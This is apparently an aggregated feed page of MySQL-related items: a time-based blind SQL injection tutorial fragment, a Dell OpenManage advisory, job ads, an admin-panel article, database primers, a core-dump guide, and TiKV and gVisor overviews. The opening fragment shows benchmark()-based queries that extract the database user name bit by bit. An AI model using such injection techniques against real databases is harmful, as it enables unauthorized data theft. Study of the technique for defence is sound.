+--------------------------------------------------------------------------------------+
1 row in set (2.35 sec)

The SQL query caused a time delay, so the condition is TRUE and the first bit is 0: 0???????

Bit 2:

Now we find the value of the second bit; as above, there are two possibilities:

00 (decimal value: 0) // TRUE condition
or
01 (decimal value: 1) // FALSE condition […]
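(Continuing the pattern as a sketch, since the original post is truncated here: with the first bit known to be 0, shifting right by 6 leaves the top two bits, so the same timing test distinguishes 00 from 01.)

mysql> select if ((ascii((substr(user(),1,1))) >> 6 )=0, benchmark(10000000,sha1('test')), 'false');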
          Full Stack Java in Argentina      Cache   Translate Page      
Argentina - Job: offer details. We are looking for a Java developer with knowledge of Grails and a good level of development skill, eager to grow and take part in a development team. Skills: Java / Grails, MySQL / PostgreSQL, some NoSQL engine, preferab...
          Dell OpenManage Network Manager 6.2.0.51 SP3 Privilege Escalation      Cache   Translate Page      
Dell OpenManage Network Manager exposes a MySQL listener that can be accessed with default credentials. This MySQL service is running as the root user, so an attacker can exploit this configuration to, e.g., deploy a backdoor and escalate privileges into the root account.
          web and android system      Cache   Translate Page      
Member levels; calculation of player input; the admin sets the output result, and the data will be saved as a report to show to the user (Budget: $750 - $1500 USD, Jobs: Android, Mobile App Development, MySQL, PHP, Software Architecture)
          Electronic Signature Ecuador      Cache   Translate Page      
Hello. XAdES-BES electronic signature for Ecuador's SRI, in PHP Zend Framework 3. Sending receipts to and receiving them from the SRI web service; the information is in Spanish ... you have to follow the SRI guidelines... (Budget: $30 - $250 CAD, Jobs: MySQL, PHP, Software Architecture, XML)
          recode website      Cache   Translate Page      
I have an e-learning website that was written a long time ago with classic ASP and MS Access. I need to re-code it in PHP because of a change of host. There are about 55 ASP files in total. (Budget: $250 - $750 USD, Jobs: ASP, HTML, MySQL, PHP, Website Design)
          PHP Programmer      Cache   Translate Page      
Ho Chi Minh City - Sign in with: PHP Programmer, Vietnam Booking Joint Stock Company. Updated: 06/11/2018. Recruitment information, workplace... good programming and algorithmic thinking; proficient in PHP & MySQL, HTML, CSS, Javascript (jQuery), WordPress; able to design and optimize...
          Comment on JDBC Batch insert update MySQL Oracle by learner001      Cache   Translate Page      
I still don't get the point of batch processing. Why is that so? What is the point of using batch processing?
          Comment on Spring MVC Hibernate MySQL Integration CRUD Example Tutorial by Aishwarya      Cache   Translate Page      
How should I connect it to MySQL? Do I need to create tables there? Please let me know the whole procedure.
          Comment on Android Login and Registration With PHP MySQL by Fateh Akmal      Cache   Translate Page      
Thank you very much for the tutorial; I did it the first time and it worked successfully. Now I need to display the details of the user that has logged in. Would you mind sharing a tutorial on displaying the user's information from the database please? Thank you
          A few modifications on a web platform      Cache   Translate Page      
Do some corrections on an online stock system (Budget: $10 - $30 USD, Jobs: CSS, HTML, MySQL, PHP, Website Design)
          convert a php site to native android      Cache   Translate Page      
A prebuilt PHP site is to be converted into a native Android app (Budget: ₹600 - ₹1500 INR, Jobs: Android, HTML, MySQL, PHP)
          Admin Panel Roundup      Cache   Translate Page      
Admin Panel Roundup

Note: this was originally published on the Retool blog.

Let’s say you need to moderate content on your platform, delete somebody’s account, or find out which of your users are most active. An admin panel is where you’d do it!

They’re good for a few things:

Housekeeping ― keeping your app running smoothly with tasks involving human input.
Fire fighting ― manually fixing unintended problems that occur in your app.
Monitoring ― tracking your app’s metrics.

There are a few off the shelf options for building admin interfaces:

Database GUI Clients
Frontend admin libraries
Backend admin frameworks
3rd-party admin tools

They’re all good at specific things. Let’s see how you can decide between them.

Database GUI Clients

Database clients are just spreadsheet-like interfaces on top of your database that let you perform CRUD operations easily. They aren’t really an “admin panel”, but they do the job if all you want is raw database access. Here are our recommendations:

SQL: Free: Postico (PostgreSQL), Sequel Pro (MySQL); Paid: DataGrip
MongoDB: Free: Robo 3T; Paid: Studio 3T

Database clients are good for firefighting. They give you complete control over your data, so you can do whatever it takes to fix problems. This is a double-edged sword though ― you might accidentally break something in the process. And if you’re scaling this out to your team, you probably don’t want everybody to have raw SQL access to your database. They could insert data that bypasses your app’s validations, delete rows accidentally, etc.

Database clients are bad for housekeeping. Their UIs aren’t optimized for data entry, so doing it regularly will be unpleasant. There’s also no way to automate common workflows ― you won’t be able to, say, approve a new comment on your blog in one click.

Database clients are bad for monitoring. At a stretch, you might be able to save queries that output your key metrics, but you’ll have to run these manually and visualize the results elsewhere.

Database clients are impossible to extend. Extending them beyond the standard CRUD use case is impossible, and involves building ETL pipelines to get the data out.

A database client makes a good admin panel if

Your project will be used infrequently
You don’t need to monitor your project’s usage and metrics
Your project will only be used by people who are technical

Frontend Admin Templates

There are lots of templates and libraries out there that provide frontend components and layouts that you can use to build admin panels. You can find templates for whichever frontend framework you use ― Bootstrap, React, Angular, you name it.

You’ll have to write code to connect the frontend to your databases and APIs, but you’ll get a decent UX out-of-the-box without much CSS and JS fiddling.

There’s one big trap to watch out for with frontend templates ― visuals.

When you’re choosing a library, the options will seem endless. Each will look better than the last. Progress bars, graphs, widgets ― they’ll promise to turn your admin panel into NASA mission control. The truth is more mundane ― you don’t need a progress bar, you might need a graph.



It’s important to optimize for utility over visuals. Your frontend admin template should work with the technologies you already use (even if it’s not the hottest JS framework), and should be easy to maintain and extend as your app evolves. Choose the boring template that does the job over the trending template that comes with 3 icon sets.

Frontend templates are great for housekeeping. They provide a good UX for data entry and editing (including data validation), and you can hook them up to trigger custom workflows.

Frontend templates are great for monitoring. You can set them up to display metrics for your business, easily visualized in charts.

Frontend templates are okay for firefighting. You can set them up to give you a lot of control in editing data, but they won’t be as flexible as a database client and you may face novel problems that require manually digging into the database to solve.

Frontend templates can be difficult to maintain and extend. Because these libraries only give you the components, you have to write custom code to put them together and connect them to your backend. Custom code has an up-front cost to write, and a continual cost to maintain.

Frontend libraries are a good option that reduce the amount of work it takes to build your own admin panel. They’re great once they’re set up, but it does take some work to get started and maintain.

Backend Admin Libraries

Popular backend frameworks have libraries that make it easy to build admin panels for your app. In some cases, they work like magic ― they can generate an entire admin panel without any extra code. In other cases, you might have to write some backend code or combine them with a frontend library.

All libraries have a trade-off between automation and customizability. We recommend a bias towards automation ― the less code you write, the smaller the surface area for errors.

Django ― Django Admin

Django Admin is a no-brainer if you have a Django backend. It automatically generates an admin site for your app, letting you perform CRUD operations for your database models. It comes with user authentication and permissions out of the box, as well as an audit log of “recent actions” ― useful if you have multiple admin users.

Django Admin is really extensible ― you can customize it to do pretty much anything with code. The default UI it generates won’t be as “sexy” as some of the frontend admin libraries, but it’s usable and refreshingly simple.

Django Admin is much like a database GUI client, though, in the sense that it only supports CRUD out of the box. It comes with all the validations you have in your Django app, but no more. The main advantage is that you can write custom code to add validations. But once you start writing custom code, you’re basically building most of your admin panel from
          MySQL Replication: Temporary tables allowed in transactions with GTIDs (no replies)      Cache   Translate Page      
https://mysqlhighavailability.com/temporary-tables-are-now-allowed-in-transactions-when-gtids-are-enabled/
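A minimal sketch of what this change permits (my own illustration, not from the linked post; it assumes gtid_mode=ON with binlog_format=ROW or MIXED, the combination this feature targets):

BEGIN;
CREATE TEMPORARY TABLE tmp_totals (id INT PRIMARY KEY, total DECIMAL(10,2));
INSERT INTO tmp_totals VALUES (1, 9.99);
DROP TEMPORARY TABLE tmp_totals;
COMMIT;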
          MySQL 8.0: HA with InnoDB Cluster + Shell (no replies)      Cache   Translate Page      
MySQL 8.0: HA with InnoDB Cluster + Shell
https://www.slideshare.net/miguelgaraujo/mysql-8-high-availability-with-innodb-clusters
          MySQL Shell: The DevOps Tool for MySQL (no replies)      Cache   Translate Page      
MySQL Shell: The DevOps Tool for MySQL
https://www.slideshare.net/miguelgaraujo/mysql-shell-the-devops-tool-for-mysql-121929980
          MySQL Group Replication: instrumentation for memory used in XCom (no replies)      Cache   Translate Page      
https://mysqlhighavailability.com/extending-replication-instrumentation-account-for-memory-used-in-xcom/
          convert a php site to native android      Cache   Translate Page      
a prebuilt php site is to be converted into a native android app (Budget: ₹600 - ₹1500 INR, Jobs: Android, HTML, MySQL, PHP)
          Tech Roundup - 6th November 2018      Cache   Translate Page      
Stuff collated since Tech Roundup - 23rd September 2018. With headings:
Cisco (FlexPod), CompTIA (and Cybersecurity), Flackbox, Industry Commentary, Microsoft, NetApp, Veeam, VMware

Cisco (FlexPod)

FlexPod Datacenter with Cisco ACI Multi-Pod, NetApp MetroCluster IP, and VMware vSphere 6.7 Design Guide

FlexPod Datacenter with Cisco ACI Multi-Pod, NetApp MetroCluster IP, and VMware vSphere 6.7 Deployment Guide

CompTIA (and Cybersecurity)

Cool Jobs: Using Cybersecurity to Protect Nuclear Power Plants

Cybersecurity Careers: Learn More About Penetration Testing

Cybersecurity Certificates, Certifications and Degrees: How to Choose

CASP vs. CISSP: 4 Advantages of CompTIA’s Advanced Cybersecurity Certification

Flackbox

List of VSA Virtual Storage Appliances and SAN Storage Simulators

Industry Commentary

Six Reasons for Multi-Cloud Computing

IBM, Red Hat and Multi-Cloud Management: What It Means for IT Pros

Microsoft

Azure File Sync is now available to the public
*Posted on Tuesday, September 26, 2017

NetApp

General

NetApp Cloud API Documentation

Image: NetApp Cloud API Documentation

Cloud Volumes Services

NetApp Kubernetes Service Demo

Azure NetApp Files Demo

NetApp Cloud Volumes Service for AWS Demo

File Storage for AWS is Now Simpler and Faster

Discover How Data Creates Medical Breakthroughs

Transforming Medical Care With Data in the Cloud (Changing the World with Data)

DreamWorks Animation: Creating at the Speed of Imagination

Building Big Data Analytics Application on AWS with NetApp Cloud Volumes

Scaling Oracle Databases in the Cloud with NetApp Cloud Volumes

NetApp Cloud Volumes as a Persistent Storage Solution for Containers

New TRs


New NVAs (NetApp Verified Architectures)

VMware Private Cloud on NetApp HCI: NVA Design

Red Hat OpenShift Container Platform with NetApp HCI: NVA Design
Red Hat OpenShift Container Platform
The Easy Button for Delivering Better Experiences. Faster. With NetApp and Red Hat.

New Posts by Justin Parisi


New on Tech ONTAP Podcast (hosted by Justin Parisi)


New on ThePub

October 2: My Name is Rocky

New on wfaguy.com


Veeam

Veeam Backup & Replication: Quick Migration

VMware

Introducing Project Dimension

VMworld 2018: We’re Rethinking the Limits of Innovation

Taking Innovation to New and Unexpected Levels at VMworld 2018

What’s New in vSAN 6.7 Update 1

What’s New in vRealize Operations 7.0

Building on the Success of Workspace ONE

Solution Brief: SD-WAN Simplified


          PHP Developer      Cache   Translate Page      
ShreeRam Technology Solution Pvt. Ltd - Indore, Madhya Pradesh - databases, and version control tools. 3) Experience with PHP 5 and other relevant tools. 4) Ability to work with UNIX commands. 5) Integrate... and functionalityRequired Experience, Skills and Qualifications PHP MySQL PHP5 Javascript Job Type: Full-time Salary: 12,000.00 to 30,000.00 /month Education...
          PHP Developer      Cache   Translate Page      
Digital Inbox - Noida, Uttar Pradesh - Required skills: Experience in HTML, CSS, and JavaScript, Wordpress, Core Php, Codeigniter, Deep expertise with supporting web standards... technologies, including WordPress, MYSQL, CMS platforms such as Magento, Core Php, Codeigniter, Familiarity with Social APIs: Facebook, Twitter...
          PHP Developer      Cache   Translate Page      
PayMiTime - Hyderabad, Telangana - Andhra Pradesh - . Follow industry best practices. Develop and deploy new features. Requirements: Proven software development experience in PHP. Demonstrable... services [MYSQL is must]. Should have worked on PHP framework CodeIgniter B.tech/BCA/BS/M.tech/MCA/MS degree in computer science or related subject...
          PHP Developer      Cache   Translate Page      
Galaxy Resource Pvt Ltd - Lucknow, Uttar Pradesh - Position: Backend developer with core skillset on PHP, MongoDB, MySQL and Couchbase. Experience : 2-5 years 1. Should have hands... on knowledge in PHP and Web development projects. 2. Good in OOPS concepts 3. Should have hands on experience in Yii Framework 4. Good working...
          Senior PHP Developer      Cache   Translate Page      
Showflipper Entertainment & Production P. Ltd - Pune, Maharashtra - person Required Experience, Skills and Qualifications Skills we are looking for : - Proficiency in PHP, JavaScript, Jquery, JS libraries , MySQL...
          Build Website/Webapplication      Cache   Translate Page      
I am looking for someone or a team to build me a new Webservice. It shall be similar to a classifieds portal but offers also the possibility to rate products. It must be able to handle a lot of users,... (Budget: $1500 - $3000 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          SQL Server数据库入门基础知识      Cache   Translate Page      
SQL Server数据库相关知识点

1、为什么要使用数据库?

数据库技术是计算机科学的核心技术之一。使用数据库可以高效且条理分明地存储数据、使人们能够更加迅速、方便地管理数据。数据库具有以下特点:

可以结构化存储大量的数据信息,方便用户进行有效的检索和访问

可以有效地保持数据信息的一致性.完整性,降低数据冗余

可以满足应用的共享和安全方面的要求

2、数据库的基本概念

⑴什么是数据?

数据就是描述事物的符号记录,数据包括数字、文字、图形、声音、图像等;数据在数据库中以“记录”的形式存储,相同格式和类型的数据将存放在一起;数据库中,每一行数据就是一条“记录”。

⑵什么是数据库和数据库表?

不同的记录组织在一起就是数据库的“表”,也就数说表就是来存放数据的,而数据库就是“表”的集合。

⑶什么是数据库管理系统?

数据库管理系统(DBMS)是实现对数据库资源有效组织、管理和存取的系统软件。它在操作系统的支持下,支持用户对数据库的各种操作。DBMS主要有以下功能:

数据库的建立和维护功能:包括建立数据库的结构和数据的录入与转换、数据库的转储与恢复、数据库的重组与性能监视等功能

数据定义功能:包括定义全局数据结构、局部逻辑数据结构、存储结构、保密模式及数据格式等功能。保证存储在数据库中的数据正确、有效和相容,以防止不合语义的错误数据被输入或输出,

数据操纵功能:包括数据查询统计和数据更新两个方面

数据库的运行管理功能:这是数据库管理系统的核心部分,包括并发控制、存取控制、数据库内部维护等功能

通信功能:DBMS与其他软件之间的通信

⑷什么是数据库系统?

数据库系统是一人一机系统,一由硬件、操作系统、数据库、DBMS、应用软件和数据库用户组成。

⑸数据库管理员(DBA)

一般负责数据库的更新和备份、数据库系统的维护、用户管理工作、保证数据库系统的正常运行。

3、数据库的发展过程

初级阶段-第一代数据库:在这个阶段IBM公司研制的层次模型的数据库管理系统-IMS问世

中级阶段-关系数据库的出现:DB2的问世、SQL语言的产生

高级阶段-高级数据库:各种新型数据库的产生;如工程数据库、多媒体数据库、图形数据库、智能数据库等

4、数据库的三种模型

网状模型:数据关系多对多、多对一,较复杂

层次模型:类似与公司上下级关系

关系模型:实体(实现世界的事物、如×××、银行账户)-关系

5、当今主流数据库

SQLServer:Microsoft公司的数据库产品,运行于windows系统上。

Oracle:甲骨文公司的产品;大型数据库的代表,支持linux、unix系统。

DB2:IBM公司的德加考特提出关系模型理论,13年后IBM的DB2问世

mysql:现被Oracle公司收购。运行于linux上,Apache和Nginx作为Web服务器,MySQL作为后台数据库,php/Perl/python作为脚本解释器组成“LAMP”组合

6、关系型数据库

⑴基本结构

关系数据库使用的存储结构是多个二维表格,即反映事物及其联系的数据描述是以平面表格形式体现的。在每个二维表中,每一行称为一条记录,用来描述一个对象的信息:每一列称为一个字段,用来描述对象的一个属性。数据表与数据库之间存在相应的关联,这些关联用来查询相关的数据。关系数据库是由数据表之间的关联组成的。其中:

数据表通常是一个由行和列组成的二维表,每一个数据表分别说明数据库中某一特定的方面或部分的对象及其属性

数据表中的行通常叫做记录或者元组,它代表众多具有相同属性的对象中的一个

数据表中的列通常叫做字段或者属性,它代表相应数据库中存储对象的共有的属性

⑵主键和外键

主键:是唯一标识表中的行数据,一个主键对应一行数据;主键可以有一个或多个字段组成;主键的值具有唯一性、不允许为控制(null);每个表只允许存在一个主键。

外键:外键是用于建立和加强两个表数据之间的链接的一列或多列;一个关系数据库通常包含多个表,外键可以使这些表关联起来。

⑶数据完整性规则

实体完整性规则:要求关系中的元组在主键的属性上不能有null

域完整性规则:指定一个数据集对某一个列是否有效或确定是否允许null

引用完整性规则:如果两个表关联,引用完整性规则要求不允许引用不存在的元组

用户自定义完整性规则

7、SQLServer系统数据库

master数据库:记录系统级别的信息,包括所有的用户信息、系统配置、数据库文件存放位置、其他数据库的信息。如果该数据库损坏整个数据库都将瘫痪无法使用。

model数据库:数据库模板

msdb数据库:用于SQLServer代理计划警报和作业

tempdb数据库:临时文件存放地点

SQL Server数据库文件类型

数据库在磁盘上是以文件为单位存储的,由数据文件和事务日志文件组成,一个数据库至少应该包含一个数据文件和一个事务日志文件。

数据库创建在物理介质(如硬盘)的NTFS分区或者FAT分区的一个或多个文件上,它预先分配了将要被数据和事务日志所使用的物理存储空间。存储数据的文件叫做数据文件,数据文件包含数据和对象,如表和索引。存储事务日志的文件叫做事务日志文件(又称日志文件)。在创建一个新的数据库的时候仅仅是创建了一个“空壳,必须在这个“空壳”中创建对象(如表等),然后才能使用这个数据库。

SQLServer2008数据库具有以下四种类型的文件

主数据文件:主数据文件包含数据库的启动信息,指向数据库中的其他文件,每个数据库都有一个主数据文件,主数据文件的文件扩展名是.mdf。

次要(辅助)数据文件:除主数据文件以外的所有其他数据文件都是次要数据文件,某些数据库可能不包含任何次要数据文件,而有些数据库则包含多个次要数据文件,次要数据文件的文件扩展名是.ndf。

事务日志文件:包含恢复数据库所有事务日志的信息。每个数据库必须至少有一个事务日志文件,当然也可以有多个,事务日志文件的推荐文件扩展名是.ldf。

文件流( Filestream):可以使得基于 SQLServer的应用程序能在文件系统中存储非结构化的数据,如文档、图片、音频等,文件流主要将SQLServer数据库引擎和新技术文件系统(NTFS)集成在一起,它主要以varbinary (max)数据类型存储数据。

Linux公社的RSS地址 : https://www.linuxidc.com/rssFeed.aspx

本文永久更新链接地址: https://www.linuxidc.com/Linux/2018-11/155182.htm


          What are the implications of memory for passing a MySQLi result to a function in ...      Cache   Translate Page      

Dear gods of Stackoverflow

Let's say I have a mysql query that selects a large dataset:

$query = "SELECT col_1, col_2, ..., col_99 FROM big_table";

And I get a MySQLi result like so:

$result = $db->query($query);

But then instead of dealing with $result in this scope, I pass it to a function:

my_function($result);

And once inside my_function(), I iterate through each row in the result and do stuff:

function my_function($result) { while($row = $result->fetch_object()) { ... } }

Please help me understand the memory implications of this approach.

In other words, what does $result contain, and are there any pitfalls with passing it to a function? Should I consider passing $result by reference instead? For what it's worth, I won't be needing $result once my_function() is done with it.

Cheers from South Africa!


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          core 文件      Cache   Translate Page      

Introduction

A business process on one of our servers crashed, and the developers reported that no core file had been generated. So let's track down what kept the core file from being produced.

What is a core file

NAME
core - core dump file

The default action of certain signals is to cause a process to terminate and produce a core dump file,
a disk file containing an image of the process's memory at the time of termination.
This image can be used in a debugger (e.g., gdb(1)) to inspect the state of the program
at the time that it terminated.
A list of the signals which cause a process to dump core can be found in signal(7).

In short: when a program crashes, it will normally generate a core file in a given directory. The core file is an image of the process's memory (plus debugging information) and is mainly used for debugging.

Configuring the system to generate core files

Using ulimit to configure the core file size

First run ulimit -a to confirm whether the system will generate core files, and look at the first line, core file size. If it is 0, core file generation is disabled; to enable it, configure the core file size as needed. To place no limit on the core file size, set:
ulimit -c unlimited
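
The same limit can also be inspected and raised from inside a process. The following is a small sketch of my own (not from the original post), assuming Linux and Python's standard resource module, which manipulates the same RLIMIT_CORE limit that ulimit -c controls.

```python
# Check and raise the core-dump size limit, then make a child dump core.
# Assumes Linux; run it somewhere you are happy to leave a core file behind.
import os
import resource

soft, hard = resource.getrlimit(resource.RLIMIT_CORE)
print(f"RLIMIT_CORE soft={soft} hard={hard}")

# Without extra privileges a process may only raise its soft limit up to the
# hard limit, so use the hard limit rather than assuming RLIM_INFINITY is allowed.
resource.setrlimit(resource.RLIMIT_CORE, (hard, hard))

pid = os.fork()
if pid == 0:
    os.abort()  # the child dies with SIGABRT and should dump core if limits allow
else:
    _, status = os.waitpid(pid, 0)
    print("child dumped core:", os.WCOREDUMP(status))
```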

Why no core file was generated

If ulimit has been set to generate core files but still no core is produced, what could the reason be?
man core lists the possible causes, as follows:
There are various circumstances in which a core dump file is not produced:

* The process does not have permission to write the core file.
(By default the core file is called core, and is created in the current working directory.
See below for details on naming.)
Writing the core file will fail if the directory in which it is to be created is nonwritable,
or if a file with the same name exists and is not writable or is not a regular file
(e.g., it is a directory or a symbolic link).

* A (writable, regular) file with the same name as would be used for the core dump already exists,
but there is more than one hard link to that file.

* The file system where the core dump file would be created is full; or has run out of inodes;
or is mounted read-only; or the user has reached their quota for the file system.

* The directory in which the core dump file is to be created does not exist.

* The RLIMIT_CORE (core file size) or RLIMIT_FSIZE (file size) resource limits for the process
are set to zero; see getrlimit(2) and the documentation of the shell's ulimit command
(limit in csh(1)).

* The binary being executed by the process does not have read permission enabled.

* The process is executing a set-user-ID (set-group-ID) program that is owned by a user (group)
other than the real user (group) ID of the process. (However, see the description of the prctl(2)
PR_SET_DUMPABLE operation, and the description of the /proc/sys/fs/suid_dumpable file in proc(5).)

* (Since Linux 3.7) The kernel was configured without the CONFIG_COREDUMP option.

In addition, a core dump may exclude part of the address space of the process
if the madvise(2) MADV_DONTDUMP flag was employed.

There are quite a few possible situations.
The following is quoted from someone else's summary:

1. Make sure the directory where the core dump will be written exists and that the process has write permission to it.
The core dump directory is the process's current working directory, which is usually the directory you were in when you issued the command that started the process.
If the process was started from a script, however, the script may change the current directory, in which case the process's real working directory will differ from the directory the script was launched from.
You can then look at the target of the "/proc/<pid>/cwd" symbolic link to determine the process's real current directory.
Processes started as system services can be checked the same way.

2. If a program calls seteuid()/setegid() to change the process's effective user or group, by default the system will not generate a core dump for it.
Many server programs call seteuid(). MySQL is one example: no matter which user you use to run mysqld_safe to start MySQL,
mysqld always runs with mysql as its effective user.
If you started a program as user A but ps shows it running as user B, then that process has called seteuid.
To let such processes generate a core dump, change the contents of /proc/sys/fs/suid_dumpable to 1 (the default is usually 0).

3. Set a large enough limit on the core dump file size.
The core file generated when a program crashes is as large as the memory the program occupied while running.
But a crashing program's behaviour cannot be estimated from its normal behaviour; errors such as buffer overflows can corrupt the stack,
so some variable often ends up holding garbage, and when the program uses that value to request memory it can occupy far more memory than usual.
So no matter how little memory the program uses in normal operation, it is best to set the size limit to unlimited to make sure the core file gets generated.
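
A quick way to check points 1 and 2 for a running process is to read the corresponding /proc entries. This is an illustrative addition of mine (not part of the quoted summary), assuming Linux with /proc mounted; the helper name is made up.

```python
# Gather the facts that decide where (and whether) a core file would be written.
import os
from pathlib import Path


def core_dump_context(pid):
    return {
        # The working directory where a plain "core" file would be created (point 1).
        "cwd": os.readlink(f"/proc/{pid}/cwd"),
        # Whether set-uid processes are allowed to dump core at all (point 2).
        "suid_dumpable": Path("/proc/sys/fs/suid_dumpable").read_text().strip(),
        # The kernel's core file naming pattern, for completeness.
        "core_pattern": Path("/proc/sys/kernel/core_pattern").read_text().strip(),
    }


if __name__ == "__main__":
    print(core_dump_context(os.getpid()))
```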

# Example analysis

```bash

# 1. The business binary has the SUID bit set
[root@xxx_game ~]# ll /home/xxx/global/app/globalserver
-rws--s--x 1 root root 737162 Mar 11 04:07 /home/xxx/global/app/globalserver

# 2. The business process was started as an ordinary (non-root) user
[root@xxx_game ~]# grep su /home/xxx/global/start.sh
su - xxx -c "cd /home/xxx/global/app;./globalserver -d"

[root@xxx_game ~]# ps aux | grep globalserver | grep -v grep
root 28448 0.2 1.2 270452 208996 ? Sl 11:16 0:55 ./globalserver -d

# 3. suid_dumpable is 0, so set-uid programs cannot generate core files
[root@xxx_game ~]# cat /proc/sys/fs/suid_dumpable
0
```

The fix for the situation above is to set `/proc/sys/fs/suid_dumpable` to 1


# Ref
[Introduction to Linux core files](http://www.cnblogs.com/dongzhiquan/archive/2012/01/20/2328355.html)
[Some caveats about core file generation under Linux](http://blog.csdn.net/fengxinze/article/details/6800175)
[How to produce a core file under Linux (core dump settings)](http://blog.csdn.net/star_xiong/article/details/43529637)
[How to configure core dumps](http://blog.csdn.net/wj_j2ee/article/details/7161586)

           TiKV      Cache   Translate Page      
Distributed transactional key-value database, originally created to complement TiDB 

TiKV ("Ti" stands for Titanium) is a distributed transactional key-value database, originally created to complement TiDB, a distributed HTAP database compatible with the MySQL protocol. TiKV is built in Rust and powered by Raft, and was inspired by the design of Google Spanner and HBase, but without dependency on any specific distributed file system.
With the implementation of the Raft consensus algorithm in Rust and consensus state stored in RocksDB, TiKV guarantees data consistency. Placement Driver (PD), which is introduced to implement auto-sharding, enables automatic data migration. The transaction model is similar to Google's Percolator with some performance improvements. TiKV also provides snapshot isolation (SI), snapshot isolation with lock (SQL: SELECT ... FOR UPDATE), and externally consistent reads and writes in distributed transactions.
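
To make that transaction model concrete, here is a toy, in-memory sketch of the optimistic flow the paragraph describes: reads see a snapshot, writes are buffered, and conflicts are detected at commit time. It is purely illustrative and is not the TiKV client API.

```python
# Toy model of snapshot reads plus optimistic commit; not the real TiKV client.
class ToyMVCCStore:
    def __init__(self):
        self.versions = {}   # key -> list of (commit_ts, value), oldest first
        self.commit_ts = 0   # global logical timestamp

    def begin(self):
        return ToyTxn(self, start_ts=self.commit_ts)


class ToyTxn:
    def __init__(self, store, start_ts):
        self.store = store
        self.start_ts = start_ts
        self.writes = {}

    def get(self, key):
        if key in self.writes:                 # read-your-own-writes
            return self.writes[key]
        for ts, value in reversed(self.store.versions.get(key, [])):
            if ts <= self.start_ts:            # snapshot read
                return value
        return None

    def put(self, key, value):
        self.writes[key] = value               # buffered until commit

    def commit(self):
        # Abort if any key we wrote was committed by someone else after our snapshot.
        for key in self.writes:
            history = self.store.versions.get(key, [])
            if history and history[-1][0] > self.start_ts:
                raise RuntimeError(f"write conflict on {key!r}, transaction aborted")
        self.store.commit_ts += 1
        for key, value in self.writes.items():
            self.store.versions.setdefault(key, []).append((self.store.commit_ts, value))


store = ToyMVCCStore()
t1, t2 = store.begin(), store.begin()
t1.put("k", "from-t1")
t1.commit()
t2.put("k", "from-t2")
try:
    t2.commit()        # conflicts with t1's commit, so it aborts
except RuntimeError as err:
    print(err)
```
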
TiKV is hosted by the Cloud Native Computing Foundation (CNCF). If you are a company that wants to help shape the evolution of cloud native technologies, consider joining the CNCF. For details about who's involved and how TiKV plays a role, read the CNCF announcement.
TiKV has the following key features:
  • Geo-Replication
    TiKV uses Raft and the Placement Driver to support Geo-Replication.
  • Horizontal scalability
    With PD and carefully designed Raft groups, TiKV excels in horizontal scalability and can easily scale to 100+ TBs of data.
  • Consistent distributed transactions
    Similar to Google's Spanner, TiKV supports externally-consistent distributed transactions.
  • Coprocessor support
    Similar to Hbase, TiKV implements a coprocessor framework to support distributed computing.
  • Cooperates with TiDB
    Thanks to the internal optimization, TiKV and TiDB can work together to be a compelling database solution with high horizontal scalability, externally-consistent transactions, support for RDBMS, and NoSQL design patterns.

TiKV Adopters

You can view the list of TiKV Adopters.

TiKV Roadmap

You can see the TiKV Roadmap.
from https://github.com/tikv/tikv

          Google 发布 gVisor - 容器沙箱运行时(sandboxed container runtime)      Cache   Translate Page      

这是来自官方博客 Open-sourcing gVisor, a sandboxed container runtime 的摘要及翻译

自 Docker 的普及开始,我们开发、打包和部署应用的方式发生了根本性的变化,但是由于容器的隔离技术所限,并不是所有的人都推崇使用容器技术,因为其共享内核机制,系统还存在很大的攻击面,这就会存在恶意应用程序侵入系统的威胁。
为了运行那些不可信以及存在潜在威胁的容器,人们开始更加重视沙箱容器:一种能在宿主机和应用程序之间提供更安全的隔离机制。
Google 发布的 gVisor ,就是这样一种新型的沙箱容器技术,它能为容器提供更安全的隔离,同时比虚拟机(VM)更轻量。 而且,gVisor 还能和 Docker 以及 Kubernetes 集成在一起,使得在生产环境中运行沙箱容器更简单。

传统的 Linux 容器并非沙箱

传统 Linux 容器中运行的应用程序与常规(非容器化)应用程序以相同的方式访问系统资源:直接对主机内核进行系统调用。内核以特权模式运行,允许它与必要的硬件交互并将结果返回给应用程序。
在传统的容器技术中,内核会对应用程序需要访问的资源施加一些限制。这些限制通过使用 Linux 的 cgroups 和命名空间技术来实现,然而并非所有的资源都可以通过这些机制来进行控制。此外,即使使用这些限制,内核仍然面向恶意程序暴露出过多的攻击面。
像 seccomp 这样的技术可以在应用程序和主机内核之间提供更好的隔离,但是它们要求用户创建预定义的系统调用白名单。在实际中,很难事先罗列出应用程序所需要的所有系统调用。如果你需要调用的系统调用存在漏洞,那么这类过滤器也很难发挥作用。

已有基于 VM 的容器技术

提高容器隔离性的一种方法是将容器运行在其自己的虚拟机(VM)之内。也就是为每个容器提供自己专用的“机器”,包括内核和虚拟化设备,并与主机完全分离。即使 guest 虚拟机存在漏洞,管理程序( hypervisor )仍会隔离主机以及主机上运行的其他应用程序/容器。
在不同的 VM 中运行容器提供了很好的隔离性、兼容性和性能,但也可能需要更大的资源占用。
Kata containers 是一个开源项目,它使用精简的虚拟机来尽量减少资源的占用,并最大限度地提高隔离容器的性能。与 gVisor 一样,Kata 也包含与 Docker 和 Kubernetes 兼容的 OCI (Open Container Initiative )运行时。

基于 gVisor 的沙箱容器( Sandboxed containers )

gVisor 比 VM 更轻量,同时具备相同的隔离级别。 gVisor 的核心是一个以普通非特权进程方式运行的内核,它支持大多数 Linux 系统调用。这个内核是用 Go 编写的,选择 Go 语言是由于其较小的内存占用以及类型安全等特性。和虚拟机一样,在 gVisor 沙箱中运行的应用程序也可以拥有独立于主机和其他沙箱、自己独自的内核和一组虚拟设备。
gVisor 通过拦截应用程序的系统调用,并充当 guest 内核,提供了非常强的隔离性,而所有的这些都运行在用户空间。和虚拟机在创建时需要一定的资源不同,gVisor 可以像普通 Linux 进程一样,随时调整自己的资源使用。可以将 gVisor 看做是一个完全虚拟化的操作系统,但是与完整的虚拟机相比,它具有灵活的资源占用和更低的固定成本。
但是,这种灵活性的代价是单个系统调用的消耗、应用程序的兼容性(和系统调用相关)以及其他问题。
